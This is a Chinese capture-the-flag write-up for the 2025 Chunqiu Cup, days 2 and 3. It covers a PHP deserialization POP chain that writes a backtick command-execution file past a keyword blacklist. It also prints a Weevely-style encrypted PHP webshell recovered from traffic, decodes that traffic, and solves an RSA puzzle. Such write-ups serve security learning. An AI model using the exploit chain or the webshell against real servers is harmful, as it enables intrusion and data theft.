2025春秋杯DAY2DAY3部分wp

DAY2

WEB

easy_ser

源码如下

<?php

//error_reporting(0);

function PassWAF1($data){

    $BlackList = array("eval", "system", "popen", "exec", "assert", "phpinfo", "shell_exec",  "pcntl_exec", "passthru", "popen", "putenv");

    foreach ($BlackList as $value) {

        if (preg_match("/" . $value . "/im", $data)) {

            return true;

        }

    }

    return false;

}

function PassWAF2($str){

    $output = '';

    $count = 0;

    foreach (str_split($str, 16) as $v) {

        $hex_string = implode(' ', str_split(bin2hex($v), 4));

        $ascii_string = '';

        foreach (str_split($v) as $c) {

            $ascii_string .= (($c < ' ' || $c > '~') ? '.' : $c);

        }

        $output .= sprintf("%08x: %-40s %-16s\n", $count, $hex_string, $ascii_string);

        $count += 16;

    }

    return $output;

}

function PassWAF3($data){

    $BlackList = array("\.\.", "\/");

    foreach ($BlackList as $value) {

        if (preg_match("/" . $value . "/im", $data)) {

            return true;

        }

    }

    return false;

}

function Base64Decode($s){

    $decodeStr = base64_decode($s);

    if (is_bool($decodeStr)) {

        echo "gg";

        exit(-1);

    }

    return $decodeStr;

}

class STU{

    public $stu;

    public function __construct($stu){

        $this->stu = $stu;

    }

    public function __invoke(){

        echo $this->stu;

    }

}

class SDU{

    public $Dazhuan;

    public function __wakeup(){

        $Dazhuan = $this->Dazhuan;

        $Dazhuan();

    }

}

class CTF{

    public $hackman;

    public $filename;

    public function __toString(){

        $data = Base64Decode($this->hackman);

        $filename = $this->filename;

        if (PassWAF1($data)) {

            echo "so dirty";

            return;

        }

        if (PassWAF3($filename)) {

            echo "just so so?";

            return;

        }

        file_put_contents($filename, PassWAF2($data));

        echo "hack?";

        return "really!";

    }

    public function __destruct(){

        echo "bye";

    }

}

$give = $_POST['data'];

if (isset($_POST['data'])) {

    unserialize($give);

} else {

    echo "<center>听说pop挺好玩的</center>";

    highlight_file(__FILE__);

}


代码审计:

先触发SDU类里的__wakeup() 发序列化自动触发wakeup,存在$Dazhuan() 可以触发STU的__invoke(),存在echo $this->stu;可以触发CTF类里的__tosting() 所以链子主思路为SDU-->STU-->CTF

对于WAF的绕过:

WAF1黑名单过滤 禁用了很多RCE关键字 但是发现没有过滤反引号

WAF3过滤了..和/防止我们目录穿越

WAF2对于原始字符组中的每个字符 $c,检查其 ASCII 值是否在可打印字符范围。如果不在这个范围,则用 . 代替


function buildChain() {

    // 创建 CTF 对象,设置 hackman 和 filename 属性

    $ctf = new CTF();

    $ctf->hackman = base64_encode("<?=`cat /f*`;");

    $ctf->filename = "1.php";

    // 创建 STU 对象,将 CTF 对象的 __toString 方法作为参数

    $stu = new STU($ctf);

    // 创建 SDU 对象,将 STU 对象作为参数

    $sdu = new SDU($stu);

    $sdu->Dazhuan=$stu;

    // 序列化 SDU 对象

    $serialized = serialize($sdu);

    // 反序列化 SDU 对象,触发 __wakeup 方法,进而调用 STU 的 __invoke 方法,最终调用 CTF 的 __toString 方法

    echo $serialized;

    unserialize($serialized);

}

// 调用构建利用链的函数

buildChain();

MISC

Weevil's Whisper

发现上传了一个shell

<?php

$k="161ebd7d";$kh="45089b3446ee";$kf="4e0d86dbcf92";$p="lFDu8RwONqmag5ex";

function x($t,$k){

$c=strlen($k);$l=strlen($t);$o="";

for($i=0;$i<$l;){

for($j=0;($j<$c&&$i<$l);$j++,$i++)

{

$o.=$t[$i]^$k[$j];

}

}

return $o;

}

if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {

@ob_start();

@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));

$o=@ob_get_contents();

@ob_end_clean();

$r=@base64_encode(@x(@gzcompress($o),$k));

print("$p$kh$r$kf");

}

?>


k为密钥161ebd7d,通过这段代码的上半段 我们知道存在异或运算 并流量分析可以看到后面有多个HTTP 状态码为200的回复包 我们直接查看最后一看

lFDu8RwONqmag5ex45089b3446eeSap6risomCodHP/PqrQaqvueeU+wURkueAeGLStP+bQE+HqsLq39zTQ2L1hsAA==4e0d86dbcf92



POC:

<?php

$key = '161ebd7d';

function x($t, $k) {

    $c = strlen($k);

    $l = strlen($t);

    $o = '';

    for ($i = 0; $i < $l; ) {

        for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {

            $o .= $t[$i] ^ $k[$j];

        }

    }

    return $o;

}

function decrypt($data) {

    global $key;

    $pkh = 'lFDu8RwONqmag5ex45089b3446ee';

    $kf = '4e0d86dbcf92';

    $base64_data = substr($data, strlen($pkh), -strlen($kf));    

    $decoded_data = base64_decode($base64_data);  

    $xor_decoded = x($decoded_data, $key);    

    $decompressed_data = gzuncompress($xor_decoded);    

    return $decompressed_data;

}

$encrypted_data = 'lFDu8RwONqmag5ex45089b3446eeSap6risomCodHP/PqrQaqvueeU+wURkueAeGLStP+bQE+HqsLq39zTQ2L1hsAA==4e0d86dbcf92';

echo decrypt($encrypted_data);

#flag{arsjxh-sjhxbr-3rdd78dfsh-3ndidjl}

DAY3

Crypto

funny_rsa

题目源代码:

import random

import libnum

from Crypto.Util.number import bytes_to_long, long_to_bytes

print("Welcome to ChunqiuCTF Game!")

print("接下来完成下面的挑战")

print("Good luck!")

# funny

hint = b' '

m = b' '

p = libnum.generate_prime(1024)

q = libnum.generate_prime(1024)

n = p * q

print("give you some funny numbers")

# funny 1

print(p+q - p*q + random.randint(-1025, +1025))

# funny 2

print(bytes_to_long(m)*bytes_to_long(hint))

# funny 3

print(bytes_to_long(m)*n*bytes_to_long(hint) - 1025)

# funny 4

print(pow(bytes_to_long(hint), 65537, n))

Welcome to ChunqiuCTF Game!

接下来完成下面的挑战

Good luck!

give you some funny numbers

-17696257697673533517695215344482784803953262308315416688683426036407670627060768442028628137969719289734388098357659521255966031131390425549974547376165392147394271974280020234101031837837842620775164967619688351222631803585213762205793801828461058523503457022704948803795360591719481537859524689187847958423587638744086265395438163720708785636319741908901866136858161996560525252461619641697255819255661269266471689541673348377717503957328827459396677344554172542244540931545166846117626585580964318010181586516365891413041095399344533013057011854734701706641516027767197631044458866554524544179750101814734153116374

23686728880494758233026798487859622755203105120130180108222733038275788082047755828771429849079142070779731875136837978862880500205129022165600511611807590195341629179443057553694284913974985006590617143873019530710952420242412437467917519539591683898715990297750494900923245055632544763410401540518654522017115269508183482044872091052235608170710105631742176900306097734799793264202179181242015892763311753674799273300604804820015447161950996038795518844564861004398396796284113803759208011

419166458284161364374927086939132546372091965414091344286510440034452974193054721041229068769658972346759176374539266235862042787888391905466876330331208651698002159575012622762558316612596034044109738533275009086940744966244759977014078484433213617582101347769476703012517531619023366639507114909172774156647998737369356116119513795863130218094614475699956104117183821832339358478426978211282822163928764161915824622224165694904342224081321345691796882691318330781141960650263488927837990954860719950761728580780956673732592771855694502630374907978111094148614378212006604233062606116168868545120407836000858982789824582335703891535021579560434875457656655941164757860852341484554015214879991896412137447010444797452119431147303295803678311972500421396900616845556636124424993090559354406417222700637726789045926994792374756038517484548544506630672251868349748176389591615802039026216656891403871728516658502023897343287181822303758976641229952646993446276281728919020747050486979968215989594984778920359425264076558022228448529089047021814759587052098774273578311709416672952218680244714492318709603579024

13541898381047120826573743874105965191304100799517820464813250201030319771155430755606644860103469823030581858410957600027665504533335597988508084284252510961847999525811558651340906333101248760970154440885012717108131962658921396549020943832983712611749095468180648011521808106480590665594160479324931351996812185581193608244652792936715504284312172734662364676167010674359243219959129435127950232321130725013160026977752389409620674167037650367196748592335698164875097139931376389630867192761783936757260359606379088577977154378217235326249540098268616890307702288393952949444753648206049856544634755301197410481479


总POC:

import gmpy2

import math

from sympy import symbols, solve, sqrt

from Crypto.Util.number import *

funny1 = -17696257697673533517695215344482784803953262308315416688683426036407670627060768442028628137969719289734388098357659521255966031131390425549974547376165392147394271974280020234101031837837842620775164967619688351222631803585213762205793801828461058523503457022704948803795360591719481537859524689187847958423587638744086265395438163720708785636319741908901866136858161996560525252461619641697255819255661269266471689541673348377717503957328827459396677344554172542244540931545166846117626585580964318010181586516365891413041095399344533013057011854734701706641516027767197631044458866554524544179750101814734153116374

funny2 = 23686728880494758233026798487859622755203105120130180108222733038275788082047755828771429849079142070779731875136837978862880500205129022165600511611807590195341629179443057553694284913974985006590617143873019530710952420242412437467917519539591683898715990297750494900923245055632544763410401540518654522017115269508183482044872091052235608170710105631742176900306097734799793264202179181242015892763311753674799273300604804820015447161950996038795518844564861004398396796284113803759208011

funny3 = 419166458284161364374927086939132546372091965414091344286510440034452974193054721041229068769658972346759176374539266235862042787888391905466876330331208651698002159575012622762558316612596034044109738533275009086940744966244759977014078484433213617582101347769476703012517531619023366639507114909172774156647998737369356116119513795863130218094614475699956104117183821832339358478426978211282822163928764161915824622224165694904342224081321345691796882691318330781141960650263488927837990954860719950761728580780956673732592771855694502630374907978111094148614378212006604233062606116168868545120407836000858982789824582335703891535021579560434875457656655941164757860852341484554015214879991896412137447010444797452119431147303295803678311972500421396900616845556636124424993090559354406417222700637726789045926994792374756038517484548544506630672251868349748176389591615802039026216656891403871728516658502023897343287181822303758976641229952646993446276281728919020747050486979968215989594984778920359425264076558022228448529089047021814759587052098774273578311709416672952218680244714492318709603579024

funny4 = 13541898381047120826573743874105965191304100799517820464813250201030319771155430755606644860103469823030581858410957600027665504533335597988508084284252510961847999525811558651340906333101248760970154440885012717108131962658921396549020943832983712611749095468180648011521808106480590665594160479324931351996812185581193608244652792936715504284312172734662364676167010674359243219959129435127950232321130725013160026977752389409620674167037650367196748592335698164875097139931376389630867192761783936757260359606379088577977154378217235326249540098268616890307702288393952949444753648206049856544634755301197410481479

n=(funny3+1025)//gmpy2.gcd(funny3+1025,funny2)

p_add_q=funny1+n

#根据题目给的代码p+q相差random.randint(-1025, +1025)遍历偏差值 delta 从 -1025 到 1025,对每个偏差值尝试计算新的 p + q,验证是不是等于n

p = 146244963903123897384722629319865983862385290427491632619680838698915634884136798118860944346342346684665267628932533730684360351083477628483048417394493368921029652616722076101582581881994784549216229374327065827698990452634615021972143959360660773895031574424678151072027651307994605157369826310532546455301

q = n//p

phi = (p-1)*(q-1)

d = gmpy2.invert(65537,phi)

hint = pow(funny4,d,n)

print(long_to_bytes(funny2//hint))


#获取p的值

import gmpy2

funny1 = -17696257697673533517695215344482784803953262308315416688683426036407670627060768442028628137969719289734388098357659521255966031131390425549974547376165392147394271974280020234101031837837842620775164967619688351222631803585213762205793801828461058523503457022704948803795360591719481537859524689187847958423587638744086265395438163720708785636319741908901866136858161996560525252461619641697255819255661269266471689541673348377717503957328827459396677344554172542244540931545166846117626585580964318010181586516365891413041095399344533013057011854734701706641516027767197631044458866554524544179750101814734153116374

funny2 = 23686728880494758233026798487859622755203105120130180108222733038275788082047755828771429849079142070779731875136837978862880500205129022165600511611807590195341629179443057553694284913974985006590617143873019530710952420242412437467917519539591683898715990297750494900923245055632544763410401540518654522017115269508183482044872091052235608170710105631742176900306097734799793264202179181242015892763311753674799273300604804820015447161950996038795518844564861004398396796284113803759208011

funny3 = 419166458284161364374927086939132546372091965414091344286510440034452974193054721041229068769658972346759176374539266235862042787888391905466876330331208651698002159575012622762558316612596034044109738533275009086940744966244759977014078484433213617582101347769476703012517531619023366639507114909172774156647998737369356116119513795863130218094614475699956104117183821832339358478426978211282822163928764161915824622224165694904342224081321345691796882691318330781141960650263488927837990954860719950761728580780956673732592771855694502630374907978111094148614378212006604233062606116168868545120407836000858982789824582335703891535021579560434875457656655941164757860852341484554015214879991896412137447010444797452119431147303295803678311972500421396900616845556636124424993090559354406417222700637726789045926994792374756038517484548544506630672251868349748176389591615802039026216656891403871728516658502023897343287181822303758976641229952646993446276281728919020747050486979968215989594984778920359425264076558022228448529089047021814759587052098774273578311709416672952218680244714492318709603579024

funny4 = 13541898381047120826573743874105965191304100799517820464813250201030319771155430755606644860103469823030581858410957600027665504533335597988508084284252510961847999525811558651340906333101248760970154440885012717108131962658921396549020943832983712611749095468180648011521808106480590665594160479324931351996812185581193608244652792936715504284312172734662364676167010674359243219959129435127950232321130725013160026977752389409620674167037650367196748592335698164875097139931376389630867192761783936757260359606379088577977154378217235326249540098268616890307702288393952949444753648206049856544634755301197410481479

n = (funny3 + 1025) // gmpy2.gcd(funny3 + 1025, funny2)

p_add_q = funny1 + n

for delta in range(-1025, 1026):

    # 尝试 p + q = p_add_q + delta

    candidate_p_add_q = p_add_q + delta

    # 解二次方程 x^2 - (p+q) x + p * q = 0

    A = 1

    B = -candidate_p_add_q

    C = n

    discriminant = B ** 2 - 4 * A * C

    if discriminant < 0:

        continue# 如果判别式为负,跳过

    sqrt_discriminant = gmpy2.isqrt(discriminant)

    if sqrt_discriminant * sqrt_discriminant == discriminant:

        # 计算 p 和 q

        p = (B + sqrt_discriminant) // (2 * A)

        q = (B - sqrt_discriminant) // (2 * A)

        # 确保 p 是较小的质数,q 是较大的质数

        p, q = min(p, q), max(p, q)

        # 检查是否满足 p * q = n

        if p * q == n:

            print(f"找到正确的 p 和 q!")

            print(f"p: {p}")

            print(f"q: {q}")

            break

WEB

easy_php

下载www.zip直接获取到源代码

在file.php文件中

<?php

header("content-type:text/html;charset=utf-8");

include 'function.php';

include 'class.php';

#ini_set('open_basedir','/var/www/html/phar2');

$file = $_GET["file"] ? $_GET['file'] : "";

if(empty($file)) {

    echo "<h2>There is no file to show!<h2/>";

}

$show = new Show();

if(file_exists($file)) {

    $show->source = $file;

    $show->_show();

} else if (!empty($file)){

    die('file doesn\'t exists.');

}

?>

在file.php文件中可以看到读取file,我们尝试直接去读取flag,直接非预期解

flag{a16dcb7549915546893a27a6d7927615}

2025春秋杯DAY2DAY3部分wp的更多相关文章

  1. 2021年春秋杯网络安全联赛秋季赛 勇者山峰部分wp

    1.签到题-Crypto Vigenere 根据题目Vigenere可看出是维吉尼亚密码 使用在线网站破解 https://guballa.de/vigenere-solver flag:53d613 ...

  2. 2019“嘉韦思”杯RSA256题目wp

    首先我们从网站下载了一个压缩包,解压出来一看里面有2个文件 首先我们先打开fllllllag康康,结果发现是一串乱码,这时候第一反应就是,文件被加密了,再看fllllllag下面的gy.key文件,更 ...

  3. 十一月百度杯pwnme 详细wp

    目录 程序基本信息 程序溢出点 整体思路 exp脚本 成功获得flag 参考 程序基本信息 可以看到开启了栈不可执行和got表不可写保护. 程序溢出点 在函数sub_400AF7中,v8可以读入0x1 ...

  4. 2019 安洵杯 Re 部分WP

    0x01.EasyEncryption 测试文件:https://www.lanzous.com/i7soysb 1.IDA打开 int sub_416560() { int v0; // eax i ...

  5. 360春秋杯CTF比赛WRIteUP

    题目:where is my cat? 地址:http://106.75.34.78 访问网页出现证书错误的问题,查看证书如下: 抓包发现: Accept-Encoding: gzip, deflat ...

  6. 深信服杯ctf部分wp

    CRYPTO1,NO SOS题目给了一段由.和-构成的密码由于题目提示不是摩斯码,将.和-化为0和1,长度为65位无法与8或7整除,无法转换为ascii,但可以被5整除,猜测为培根密码,将0化为a,1 ...

  7. 2021羊城杯比赛复现(Crypto)

    bigrsa 题目: from Crypto.Util.number import * from flag import * n1 = 10383529640908175186077053551474 ...

  8. 2017 百度杯丶二月场第一周WP

    1.祸起北荒 题目: 亿万年前 天子之子华夜,被父神之神末渊上神告知六荒十海之北荒西二旗即将发生一场"百度杯"的诸神之战 他作为天族的太子必须参与到此次诸神之战定六荒十海 华夜临危 ...

  9. CTF-i春秋网鼎杯第四场部分writeup

    CTF-i春秋网鼎杯第四场部分writeup 因为我们组的比赛是在第四场,所以前两次都是群里扔过来几道题然后做,也不知道什么原因第三场的题目没人发,所以就没做,昨天打了第四场,简直是被虐着打. she ...

  10. CTF-i春秋网鼎杯第二场misc部分writeup

    CTF-i春秋网鼎杯第二场misc部分writeup 套娃 下载下来是六张图片 直接看并没有什么信息 一个一个查看属性 没有找到有用信息 到winhexv里看一下 都是标准的png图片,而且没有fla ...

随机推荐

  1. 多校A层冲刺NOIP2024模拟赛09

    多校A层冲刺NOIP2024模拟赛09 考试唐完了,T2.T4 都挂了 100 分,人麻了. 排列最小生成树 给定一个 \(1, 2,\dots , n\) 的排列 \(p_1, p_2,\dots, ...

  2. 2024 BUPT Programming Contest F

    简要题意 多测,给定一个 \(n \times n\) 矩阵,矩阵中的每一个元素的计算方式如下: 矩阵的行和列唯一决定两个整数对 \((a, b)\),矩阵第 \(a(0 \le a < n)\ ...

  3. Open-RAG:将开源LLM模型集成为高效RAG模型 | ENMLP'24

    本文是对公开论文的核心提炼,旨在进行学术交流.如有任何侵权问题,请及时联系号主以便删除. 来源:晓飞的算法工程笔记 公众号,转载请注明出处 论文: Open-RAG: Enhanced Retriev ...

  4. SpringBoot实现轻量级动态定时任务管控及组件化

    关于动态定时任务 关于在SpringBoot中使用定时任务,大部分都是直接使用SpringBoot的@Scheduled注解,如下: @Component public class TestTask ...

  5. Java IO 框架整理

    昨天笔试时碰到了IO流的题目,很久没接触IO编程了,所以那道题目做的不行. 搜了一下,这篇文章总结的很有条理,果断转载. 转自:http://tanshenghui.javaeye.com/blog/ ...

  6. 进程管理工具之supervisor(完整版)*

    Supervisor 介绍 Supervisor是用Python开发的一套通用的进程管理程序,能将一个普通的命令行进程变为后台daemon,并监控进程状态,异常退出时能自动重启.它是通过fork/ex ...

  7. CudaSPONGE之Python接口

    技术背景 在上一篇博客中我们介绍了CudaSPONGE的基本安装和使用方法.为了性能考虑,CudaSPONGE是基于纯CUDA C开发的,但是现在很多轮子都是Python开发的.为兼容更多的框架和平台 ...

  8. PythonDay2Base

    PythonDay2Base 前文见上一篇文章 数据类型详解 字符串 str 补充 startswith 判断字符串是否以某个小字符串开头 s1 = "shujia数加科技学习study&q ...

  9. fastadmin-表单使用

    1.日期时间 在FastAdmin中的日期时间组件采用的是Bootstrap-datetimepicker插件,官方文档:Bootstrap-datetimepicker官方教程 日期时间格式设置:设 ...

  10. 销讯通CRM客户关系管理系统的功能拆分

    随着技术的发展,CRM系统(客户关系管理)成为企业不可或缺的工具,本文从医药行业角度简要谈谈CRM系统的功能. 从业务的理解来说,从医药行业来说,CRM客户管理系统的有以下几部分功能: 01 客户的分 ...